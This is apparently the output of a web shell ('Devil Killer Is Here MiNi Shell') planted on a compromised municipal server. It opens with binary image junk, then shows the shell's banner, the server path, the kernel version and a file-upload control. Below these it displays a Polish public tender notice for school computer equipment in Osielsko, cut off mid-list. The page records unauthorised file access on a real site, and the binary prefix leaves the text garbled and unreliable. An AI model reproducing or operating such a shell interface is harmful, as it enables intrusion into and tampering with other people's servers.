JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/0021348601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Doposażenie pracowni przedmiotowych w sprzęt komputerowy i pomoce dydaktyczne w ramach projektu pn. „Projekty edukacyjne dla szkół podstawowych Gminy Osielsko”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ D/S OŚWIATY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 091588577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Centralna 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Osielsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-031</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdso.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.osielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Doposażenie pracowni przedmiotowych w sprzęt komputerowy i pomoce dydaktyczne w ramach projektu pn. „Projekty edukacyjne dla szkół podstawowych Gminy Osielsko”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3ab2b16-1267-460c-90b0-e68e5792b16c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00213486</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00040840/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Doposażenie pracowni przedmiotowych w sprzęt dydaktyczny i pomoce naukowe w ramach projektu pn. &#34;Projekty edukacyjne dla szkół podstawowych Gminy Osielsko&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Kujaw i Pomorza 2021 – 2027, Wsparcie na rzecz szkolnictwa podstawowego i średniego (z wyłączeniem infrastruktury w latach od Projekty edukacyjne dla szkół podstawowych Gminy Osielsko. Program: FEKP.00.00, Priorytet FEKP.08.00, Działanie FEKP.08.12, organizująca nabór: Miasto Bydgoszcz: FEKP.08.12-IP.02-005/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f3ab2b16-1267-460c-90b0-e68e5792b16c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia. Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adresy e-mail sekretariat@zdso.pl lub grzegorz.jankowski@zdso.pl (w zakresie np. zadawania pytań dot. wyjaśnienia treści SWZ, przekazywania wezwań i zawiadomień, nie dotyczy składania ofert!). Korzystanie z Platformy e-Zamówienia jest bezpłatne. Sposób sporządzania i przekazywania dokumentów oraz niezbędne wymagania sprzętowo - aplikacyjne określa rozdział X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO”), informujemy o zasadach przetwarzania Pani/Pana danych osobowych oraz o przysługujących Pani/Panu prawach:<br/>1. Administratorem Pani/Pana danych osobowych jest Zespół ds. Oświaty w Osielsku. W sprawach związanych z Pani/Pana danymi osobowymi przetwarzanymi przez Administratora Danych można kontaktować się wysyłając korespondencję: ul. Centralna 6, 86-031 Osielsko, adres e-mail: sekretariat@zdso.pl lub za pomocą tel. 52 320 31 20.<br/>2. Kontakt z Inspektorem Ochrony Danych, jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania Zespołu ds. Oświaty w Osielsku, a także przysługujących Pani/Panu uprawnień za pomocą adresu: hanna.kielbon@iod-rodo.pl lub tel. 729 057 572, 662 08 02 08.<br/>3. Pani/Pana dane przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Doposażenie pracowni przedmiotowych w sprzęt komputerowy i pomoce dydaktyczne w ramach projektu pn. „Projekty edukacyjne dla szkół podstawowych Gminy Osielsko” nr 261.1.2025 na podstawie art. 6 ust. 1 lit. c RODO, gdyż jest to niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze Danych, wynikającego z przepisów:<br/>1)	ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, nazywaną dalej ustawą Pzp;<br/>2)	rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 18 grudnia 2020 r. w sprawie protokołów postępowania oraz dokumentacji postępowania o udzielenie zamówienia publicznego;<br/>3)	rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy;<br/>4)	ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>4. Pani/Pana dane osobowe pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane i przechowywane będą zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmować będzie cały czas trwania umowy.<br/>5.	Odbiorcami Pani/Pana danych osobowych mogą być uprawnione instytucje określone przez przepisy prawa, a także osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art. 74 ustawy Pzp.<br/>	Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o zamówienie publiczne mogą być podmioty, z którymi Administrator zawarł umowy oraz umowy powierzenia przetwarzania danych osobowych, w szczególności na usługi serwisowe oprogramowania oraz systemów informatycznych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorcami danych mogą być również podmioty świadczące na rzecz Administratora usługi doradcze, prawne, archiwizacyjne, windykacyjne, audytorskie.<br/>6. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego przysługują Pani/Pana następujące uprawnienia:<br/>1)	na podstawie art. 15 RODO prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania (poprawiania) swoich danych1;<br/>3)	na podstawie art. 18 RODO prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa2;<br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr sprawy: 261.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Laptop: 24 szt. <br/><br/>Minimalne wymagania:<br/>1) wydajność w teście:<br/>a) CrossMark- 1400 punktów,<br/>b) Procyon Office Productivity- 5700 punktów,<br/>c) Geekbench 6 Single-core- 2300 punktów oraz multi-core- 8700 punktów;<br/>2) procesor typu Intel Core i5<br/>3) pamięć RAM: 16 GB lub 8 GB w przypadku pamięci zunifikowanej;<br/>4) dysk SSD: 256 GB; <br/>5) karta graficzna zintegrowana z procesorem;<br/>6) wbudowane porty i złącza: HDMI, RJ-45, USB 3.1, USB 3.1 TYP-C, USB 2.0;<br/>7) 1 port typu combo (słuchawki i mikrofon);<br/>8) czytnik kart mikro SD;<br/>9) Wi-Fi 6;<br/>10) Bluetooth 5;<br/>11) wbudowany mikrofon;<br/>12) wbudowana kamera;<br/>13) wbudowane głośniki stereo;<br/>14) klawiatura QWERTY;<br/>15) ekran:<br/>a) kolorowy wyświetlacz,<br/>b) przekątna- 15,6 cali,<br/>c) rozdzielczość- 1920×1080 (1080 p),<br/>d) jasność- 250 cd/m2,<br/>16) zasilacz sieciowy przystosowany do polskiego systemu energetycznego;<br/>17) bateria;<br/>18) czas pracy laptopa przy zasilaniu bateryjnym i średnim obciążeniu- 6 godzin;<br/>19) waga laptopa wraz z baterią do 2,5 kg;<br/>20) wbudowane mechanizmy bezpieczeństwa dostępu do danych.<br/><br/>Oprogramowanie zainstalowane na pamięci masowej lub udostępnione do nieodpłatnego pobrania przy rozpoczęciu użytkowania:<br/>1) 64-bitowy system operacyjny posiadający polską wersję językową: typu Windows 10 Professional lub Windows 11 Professional; <br/>2) edytor tekstu z możliwością osadzania zewnętrznych obiektów i możliwością zapisywania plików również w formacie PDF;<br/>3) arkusz kalkulacyjny;<br/>4) aplikacja do tworzenia prezentacji;<br/>5) przeglądarka internetowa;<br/>6) aplikacja do obsługi poczty elektronicznej;<br/>7) aplikacja do tworzenia i edycji grafiki rastrowej;<br/>8) aplikacja do tworzenia i edycji grafiki wektorowej;<br/>9) aplikacja do tworzenia i obsługi baz danych;<br/>10) środowisko do programowania adekwatne do szkoły podstawowej;<br/>11) edytor wideo;<br/>12) edytor dźwięku;<br/>13) oprogramowanie antywirusowe wraz z jego aktualizacją co roku do najnowszej wersji w okresie 5 lat od dnia rozpoczęcia użytkowania. <br/><br/>Oprogramowanie powinno być zaktualizowane do wersji wspieranej przez twórców.<br/><br/>Producent laptopa powinien posiadać:<br/>1) certyfikat ISO 9001 systemu zarządzania jakością;<br/>2) certyfikat ISO 14001 zarządzania środowiskiem.<br/><br/>Laptop powinien posiadać:<br/>1) certyfikat TCO lub certyfikat EPEAT dla Polski;<br/>2) deklarację zgodności UE i oznakowanie CE.<br/><br/>Gwarancja:<br/>Laptop powinien być objęty co najmniej 24-miesięcznym okresem gwarancji producenta. Serwis gwarancyjny powinien być zlokalizowany na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania laptopa wszelkie koszty związane z dostarczeniem laptopa do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Komputer All in One<br/><br/>1. Komputer All in One- 72 szt. <br/><br/>Minimalne wymagania:<br/>1)	wydajność w teście: <br/>a) CrossMark- 1400 punktów,<br/>b) Procryon Office Productivity- 5700 punktów, <br/>c)	Geekbench 6 Single-core- 3600 punktów oraz multi-core- 13 000 punktów;<br/>2)	procesor typu Intel Core i5; <br/>3)	pamięć RAM: 16 GB lub 8 GB w przypadku pamięci zunifikowanej;<br/>4)	dysk SSD: 256 GB; <br/>5)	karta graficzna: zintegrowana z procesorem; <br/>6)	wbudowane porty i złącza: HDMI, RJ-45, USB 3.0- 2 szt., USB 2.0- 1 szt.; <br/>7)	1 port typu combo (słuchawki i mikrofon); <br/>8)	czytnik kart;<br/>8) Wifi 6;<br/>9)	Bluetooth 5;<br/>10)	wbudowana kamera;<br/>10)	wbudowane głośniki stereo;<br/>11)	wbudowany mikrofon;<br/>12)	klawiatura QWERTY;<br/>13)	ekran:<br/>a)	przekątna: 23,8 cala, <br/>b)	rozdzielczość 1920×1080 (1080p),<br/>c)	kąt widzenia minimum 178 stopni/178 stopni,<br/>d)	jasność minimum 250 cd/m2, <br/>14)	zasilacz sieciowy przystosowany do polskiego systemu energetycznego;<br/>15)	stopa komputerowa wyposażona w regulację wysokości pochyłu lub obrotu (PIVOT),<br/>14)	mysz komputerowa.<br/><br/>Oprogramowanie zainstalowane na pamięci masowej lub udostępnione do nieodpłatnego pobrania przy rozpoczęciu użytkowania: <br/>1)	64-bitowy system operacyjny posiadający polską wersję językową: typu system operacyjny: typu Windows 11 Professional 64 bit.<br/>2) edytor tekstu z możliwością osadzania zewnętrznych obiektów i możliwością zapisywania plików również w formacie PDF; <br/>3)	arkusz kalkulacyjny; <br/>4)	aplikacja do tworzenia prezentacji; <br/>5)	przeglądarka internetowa; <br/>6)	aplikacja do obsługi poczty elektronicznej; <br/>7)	aplikacja do tworzenia i edycji grafiki rastrowej; <br/>8)	aplikacja do tworzenia i edycji grafiki wektorowej; <br/>9)	aplikacje do tworzenia i obsługi baz danych;<br/>10)	środowisko do programowania adekwatne do szkoły podstawowej; <br/>11)	edytor wideo; <br/>12)	edytor dźwięku; <br/>13)	oprogramowanie antywirusowe wraz z jego aktualizacją co roku do najnowszej wersji. <br/><br/>Oprogramowanie powinno być zaktualizowane do wersji wspieranej przez twórców.<br/><br/>Producent komputera All in One powinien posiadać:<br/>1) certyfikat ISO 9001 systemu zarządzania jakością;<br/>2) certyfikat ISO 14001 zarządzania środowiskiem.<br/><br/>Komputer AIO powinien posiadać:<br/>1) deklarację zgodności UE i oznakowanie CE;<br/>2) certyfikat TCO lub EPEAT. <br/><br/>Gwarancja:<br/>Komputer All in One powinien być objęty co najmniej 24-miesięcznym okresem gwarancji z serwisem producenta zlokalizowanym na terytorium Rzeczypospolitej Polskiej. W przypadku naprawy realizowanej poza miejscem użytkowania komputera All in One wszelkie koszty związane z dostarczeniem komputera All in One do serwisu i z powrotem do użytkownika powinny być pokryte przez gwaranta w ramach gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie osób bezrobotnych do 30 roku życia lub po ukończenia 50 roku życia posiadających status osób bezrobotnych lub zatrudnienia nie wcześniej niż 90 dni przed terminem składania ofert osób w wieku do 30 roku życia lub po ukończenia 50 roku życia, które wcześniej posiadały status osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Monitor interaktywny<br/><br/>1. Monitor interaktywny: 8 szt.<br/><br/>Minimalne wymagania:<br/>1)	przekątna: 75 cali;<br/>2)	podświetlenie: DLED;<br/>3)	ekran dotykowy;<br/>4)	format: 16:9;<br/>5)	kąt widzenia: 178 stopni;<br/>6)	rozdzielczość: 4K/Ultra HD;<br/>7)	jasność: 400 cd/m2;<br/>8)	kontrast 5000:1;<br/>9)	żywotność matrycy: 50 000 godzin;<br/>10)	dokładność: +/- 1 mm;<br/>11)	porty: <br/>a)	przedni panel: 1 x HDMI IN; 1 x USB Touch; 1 x USB-C/w PD; 2 x USB-A 3.0<br/>b)	boczny lub tylny panel: 2 x HDMI IN; 1 x Display Port; 1 x USB Touch; 1 x USB-C; 3 x USB-A; 1 x HDMI OUT; 1 x RJ-45 in, 1 x RJ-45 out; 1 x RS232; 1 x Audio OUT;<br/>12)	Bluetooth 5; <br/>13)	Wi-Fi 6; <br/>14)	LAN;<br/>15)	karta sieciowa;<br/>16) karta dźwiękowa HD audio;<br/>17)	moc głośników: 2x 20W; <br/>18)	pamięć 